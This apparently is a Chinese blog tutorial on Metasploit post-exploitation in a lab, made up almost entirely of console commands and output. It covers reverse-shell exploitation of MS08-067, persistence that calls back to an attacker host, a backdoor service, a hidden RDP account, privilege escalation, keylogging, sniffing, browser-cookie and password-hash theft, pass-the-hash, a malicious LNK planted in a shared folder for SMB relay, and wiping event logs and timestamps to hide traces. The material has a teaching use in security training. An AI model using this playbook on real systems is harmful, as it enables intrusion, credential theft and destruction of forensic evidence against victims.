【Metasploit总结】之【后渗透】

最新推荐文章于 2024-07-10 12:09:21 发布
最新推荐文章于 2024-07-10 12:09:21 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/111060257
版权

后渗透

简单使用

普通session

此时已经获取到session1,以enum_drives后渗透模块为例:

msf6 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/forensics/enum_drives 
msf6 post(windows/gather/forensics/enum_drives) > set session 1
session => 1
msf6 post(windows/gather/forensics/enum_drives) > run
# 即可获得磁盘分区情况

meterpreter

检查是否为虚拟机:

msf6 post(windows/gather/forensics/enum_drives) > use exploit/windows/smb/ms08_067_netapi

msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130

msf6 exploit(windows/smb/ms08_067_netapi) > set target 34

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms08_067_netapi) > run

meterpreter > run post/windows/gather/checkvm 

[*] Checking if ROOKIE8J-A4C239 is a Virtual Machine ...
[+] This is a VMware Virtual Machine

后渗透模块

persistence

写入注册表,并开机自启,间隔回连:

meterpreter > run persistence -X -i 5 -p 443 -r 192.168.172.136
# -X开机自启,-i反弹连接间隔时间,-p反弹连接本机的端口,-r回连地址

建立连接:

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.172.136
lhost => 192.168.172.136
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > run

目标重启后也会回弹meterpreter shell。
在这里插入图片描述

metsvc

将meterpreter 以系统服务的形式安装到目标主机:

meterpreter > run metsvc

会开启一个监听端口,等待连接。

getgui

meterpreter > run getgui -u metasploit -p meterpreter
# 将会在目标主机添加一个账号为metasploit,密码为meterpreter的用户,并开启3389(RDP服务)
# 如果对方在内网可以使用portwd 进行端口转发

提权

getsystem 命令

meterpreter的提权命令,集成了4种提权方式:

meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
		0 : All techniques available
		1 : Named Pipe Impersonation (In Memory/Admin)
		2 : Named Pipe Impersonation (Dropper/Admin)
		3 : Token Duplication (In Memory/Admin)
		4 : Named Pipe Impersonation (RPCSS variant)

1和4分别是利用MS09-012 和MS10-015 中的漏洞,括号中的内容为(环境/权限)。

信息窃取

dumplinks 模块

用于查看最近使用的文件:

meterpreter > run post/windows/gather/dumplinks

运行较慢的原因是对每一个LNK文件,Metasploit都会在/root/.msf4/loot目录下生成对应记录文件,包含了这个LNK文件对应的原始文件位置、创建和修改时间等信息。

enum_applications 模块

获取目标主机安装的软件、安全更新和漏洞补丁信息:

meterpreter > run post/windows/gather/enum_applications

keyscan 命令

用于记录键盘敲击:

meterpreter > keyscan_start
# 开始记录
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
# 显示已记录
Dumping captured keystrokes...
<LAlt><Delete><Left Windows>cmd<CR>
<CR>
<Shift>ipconfig<CR>


meterpreter > keyscan_stop
# 结束记录
Stopping the keystroke sniffer...

口令窃取

meterpreter > use sniffer
# 加载sniffer
Loading extension sniffer...Success.
meterpreter > help
# 查看sniffer帮助
Sniffer Commands
================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_release     Free captured packets on a specific interface instead of downloading them
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

网络嗅探

meterpreter > sniffer_interfaces
# 查看网卡

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter > sniffer_start 1
# 选择嗅探的网卡
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump 1 /root/Desktop/interface1_sniffer.cap
# 导出已嗅探的内容
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 290 packets (29979 bytes)
[*] Downloaded 100% (29979/29979)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/Desktop/interface1_sniffer.cap
meterpreter > sniffer_stop 1
# 停止嗅探
[*] Capture stopped on interface 1
[*] There are 63 packets (5506 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'

导出文件可直接利用WIRESHARK等工具查看:
在这里插入图片描述
在这里插入图片描述

浏览器嗅探

  • enum_ie模块
    读取ie浏览器历史记录、Cookie、缓存密码,并保存到本地。
meterpreter > run post/windows/gather/enum_ie

[*] IE Version: 6.0.2900.5512
[-] This module will only extract credentials for >= IE7
[*] Retrieving history.....
	File: C:\Documents and Settings\rookie8j\Local Settings\History\History.IE5\index.dat
[*] Retrieving cookies.....
	File: C:\Documents and Settings\rookie8j\Cookies\index.dat
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...
[*] Writing history to loot...
[+] Data saved in: /root/.msf4/loot/20201212025906_default_192.168.172.130_ie.history_602395.txt
[*] Writing cookies to loot...
[+] Data saved in: /root/.msf4/loot/20201212025906_default_192.168.172.130_ie.cookies_503272.txt

系统口令窃取

hashdump

meterpreter集成了hashdump:

meterpreter > hashdump
Administrator:500:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:b2f7853c30c9809fba087b5c69bf8010:c9e91651a773e255d1dece9e33f1708d:::
rookie8j:1003:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:6943f86ea17235a1f19eac0dfb947781:::

缺点:非system权限下会失败;Win7/Vista、Win2008进程移植可能不成功。

smart_hashdump 模块

弥补了hashdump缺点。

meterpreter > run windows/gather/smart_hashdump

[*] Running module against ROOKIE8J-A4C239
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20201212030506_default_192.168.172.130_windows.hashes_202408.txt
[*] Dumping password hashes...
[+] 	Administrator:500:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942
[+] 	HelpAssistant:1000:b2f7853c30c9809fba087b5c69bf8010:c9e91651a773e255d1dece9e33f1708d
[+] 	rookie8j:1003:b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942
[+] 	SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:6943f86ea17235a1f19eac0dfb947781

内网拓展

内网转发

meterpreter > run get_local_subnets
# 获取本网段信息
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.172.0/255.255.255.0
meterpreter > background 
[*] Backgrounding session 4...
msf6 exploit(multi/handler) > route add 192.168.172.0 255.255.255.0 4
# 将到目标网段的所有流量都经过目标会话(session 4)进行转发
[*] Route added
msf6 exploit(multi/handler) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.172.0      255.255.255.0      Session 4

[*] There are currently no IPv6 routes defined.

smb哈希传递攻击

假设已经获取到内网一台普通员工主机的hash值:

端口扫描:

msf6 > db_nmap -sS -p 445 192.168.172.0/24

发现了一台服务器192.168.172.136开启了smb,利用此员工的hash值进行hash传递攻击:

msf6 > use exploit/windows/smb/psexec 

msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(windows/smb/psexec) > set lhost 192.168.172.136
# 本机ip
msf6 exploit(windows/smb/psexec) > set lport 443
# 本机侦听端口
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.172.131
# 目标服务器
msf6 exploit(windows/smb/psexec) > set smbpass b73a13e9b7832a35aad3b435b51404ee:afffeba176210fad4628f0524bfe1942
# 员工hash值
msf6 exploit(windows/smb/psexec) > run

此时本机开始侦听:

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.172.136

msf6 exploit(multi/handler) > set lport 443

msf6 exploit(multi/handler) > run

一旦员工利用hash值访问服务器smb,服务器就会反弹一个meterpreter shell给本机。

MS08-068 配合MS10-046

此时已获得一个session的情况下:

msf6 post(windows/escalate/droplnk) > set lhost 192.168.172.136
# 设置本机ip
msf6 post(windows/escalate/droplnk) > set session 4
# 设置会话
msf6 post(windows/escalate/droplnk) > run

[*] Creating evil LNK
[*] Done. Writing to disk - C:\Documents and Settings\rookie8j\Words.lnk
# 会生成一个Words.lnk文件
[*] Done. Wait for evil to happen..
[*] Post module execution completed

搭建smb服务:

msf6 post(windows/escalate/droplnk) > use windows/smb/smb_relay
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/smb_relay) > set srvhost 192.168.172.136
# 设置本机ip
msf6 exploit(windows/smb/smb_relay) > set payload windows/meterpreter/reverse_tcp
# 设置meterpreter payload
msf6 exploit(windows/smb/smb_relay) > set lhost 192.168.172.136
# 设置本机ip
msf6 exploit(windows/smb/smb_relay) > run
# 启动smb服务

将Words.lnk文件复制到一个公司共享文件夹内,等待其他用户访问,就会连接到本机smb服务,获得一个meterpreter shell。

湮灭行踪

clearev命令

清除日志:

meterpreter > clearev 
[*] Wiping 535 records from Application...
[*] Wiping 65 records from System...
[*] Wiping 1 records from Security...

timestomp命令

修改文件时间。

meterpreter > timestomp 1.txt -f 2.txt
# 将前者时间修改为与后者一样
AA8j
关注
专栏目录
metasploit渗透框架使用说明——后面介绍后渗透模块和网络渗透
记录并分享学习安全的知识点..
01-04 1055
一、模块划分 MSF是渗透测试领域最流行的渗透测试框架,它有以下几个模块:辅 助 模 块 (Auxiliary,扫描器)——扫描主机系统,寻找可用漏洞;渗透攻击模块 (Exploits)——选择并配置一个漏洞利用模块;攻击载荷模块 (Payloads)——选择并配置一个攻击载荷模块;后渗透攻击模块 (Post)——用于内网渗透的各种操作;编 码 器 模 块 (Encoders)——选择编码技术,绕过杀软(或其他免杀方式);; 所有模块位置:/usr/share/metasploit-framework/m
[网络安全提高篇] 一〇三.Metasploit渗透技术之信息收集、权限提权和功能模块
杨秀璋的专栏
03-04 5327
本文是“网络安全提高篇”第三篇文章,继续带领大家深入Metasploit技术,涉及后渗透相关的技术,包括信息收集、权限提权、移植漏洞模块和后门。同时,结合作者之前的漏洞利用及WannaCry逆向经验总结。本文学习了徐焱老师他们的《Web安全攻防渗透测试实战指南》,在此感谢。“网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。
Metasploit framework(八)——后渗透测试
Jeromeyoung
04-03 424
渗透测试,直接用实例演示过程如下: 基于已经获取meterpreter,getsystem,同时上传文件扫描内网网段中其他主机。同时在该受控主机下留下持久后门。 在system的权限下上传nmap.exe,至于获取system的权限方法就不说了,太多了,利用漏洞、进程注入都可以达到。 至于持久后门,可以加入开机启动项、修改注册表方式,或者隐藏绑...
【内网渗透】MSF后渗透阶段常用操作笔记
最新发布
uuzeray的博客
07-10 823
1、先看下目标靶机已存在用户 meterpreter中输入:run post/windows/gather/enum_logged_on_users。6 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。启动远程桌面协议:run post/windows/manage/enable_rdp。
Metasploit渗透命令大全讲解——超详细
渗透测试
05-14 3984
文章目录前言一、基本后渗透命令1.帮助菜单2.后台命令3.机器ID和UUID命令4.通信信道5.获取用户和进程信息6.获取系统信息7.网络命令总结 前言 获取meterpreter权限后,使用后渗透命令完成目的操作 一、基本后渗透命令 获取meterpreter可以使用的命令,用来控制目标主机 1.帮助菜单 meterpreter > help Core Commands ============= Command Description
metasploit渗透之基础知识
Longwaer
01-31 2511
学习了解MSF后渗透小技巧,更好的在实战中对内部网络进行发现并横向。
Metasploit渗透技巧[1] 内网搭桥【转】
qdslg的专栏
07-29 917
对于一次成功的渗透测试,往往都需要很多优秀的工具进行辅助。在渗透测试中听说用的最多的是一个叫做metasploit。因此想从屌丝脚本小子变成了土豪级脚本小子。所以开始了metasploit学习之旅,希望在记录下自己成长的足迹,把没有学习到知识点,无论大小都记录下来。因此有了下面和下下面的相关文章,如有错误请给予指正。 一、问题描述 在渗透测试时,m...
metasploit中使用lnk漏洞渗透测试.doc
03-18
Metasploit 中使用 LNK 漏洞进行渗透测试 ...总结:使用 Metasploit 中的 LNK 漏洞进行渗透测试可以获得目标机的 shell 权限,但需要注意目标机的安全防护设置,例如补丁和杀毒软件的存在可能会影响测试的成功率。
关于Metasploit Framework与渗透测试相关知识
12-28
总结Metasploit Framework是渗透测试者的重要武器,它的强大功能和灵活扩展性使得安全测试工作更加高效。然而,正确且负责任地使用这些工具至关重要,因为任何非法或未经授权的活动都可能导致法律问题。因此,学习...
Metasploit框架的后渗透测试
其强大的功能和广泛的渗透测试范围使其成为安全社区中最受欢迎的工具之一。 ## 1.2 后渗透测试简介 后渗透测试是指在成功入侵目标系统后,对系统进行深入测试和探查,以获取更多权限、信息或执行其他操作的过程。...
Metasploit中的后渗透技术探索
Metasploit是一款广泛使用的渗透测试工具,它提供了多种漏洞利用方法和后渗透技术,能够帮助安全人员评估系统的安全性,并测试网络的防御能力。Metasploit框架由Rapid7公司开发,是一个开源的项目,具有易于使用、...
如何使用Metasploit进行后渗透攻击?
m0_74131821的博客
05-29 1278
渗透攻击(PostExploitation)是整个渗透测试过程中最能够体现渗透测试团队创造力与技术能力的环节
metasploit渗透测试
BigYellow
11-08 4018
一些常用指令msfconsole 打开控制台终端 msfupdate 更新 help [command] e.g. help search 命令使用帮助信息 search […] e.g. search portscanuse … 选择渗透攻击模块 show payloads 查看与该攻击模块相兼容的攻击载荷 set payload … 设置攻击载荷 set t
MSF后渗透操作
weixin_51583379的博客
11-03 1587
1.文件交互指令Linux权限理解chmod 777 {文件名.后缀}
MSF后渗透
wo41ge的博客
11-24 3742
信息收集 获取目标机器的分区情况: post/windwos/gather/forensics/enum_drives 判断是否为虚拟机 post/windows/gather/checkvm 开启了哪些服务 :post/windwos/gather/enum_services 安装了哪些应用: post/windows/gather/enum_applications 查看共享: post/windows/gather/enum_shares 获取主机最近的系统操作: post/windows/gathe
msf后渗透
weixin_30794491的博客
04-13 235
生成exe后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.ex 传到测试机执行后得到反弹shell msfconsole msf > use multi/handlermsf exploit(multi/handl...
msf后渗透Meterpreter命令)
2302_76986722的博客
09-17 518
6 ,获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用。filenname,path这两个也可以进行设置,比如名字改成qq.exe,就会qq在提权,更容易上。
Metasploit学习总结
leeham的博客
12-03 910
Metasploit学习总结 最近需要利用metasploit工具找到”针对win732攻击成功、拿到shell并且能够上传文件“的exploit。实现过程中对Metasploit框架有所了解,总结如下。 METASPLOIT基础入门 Metasploit的基本使用 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值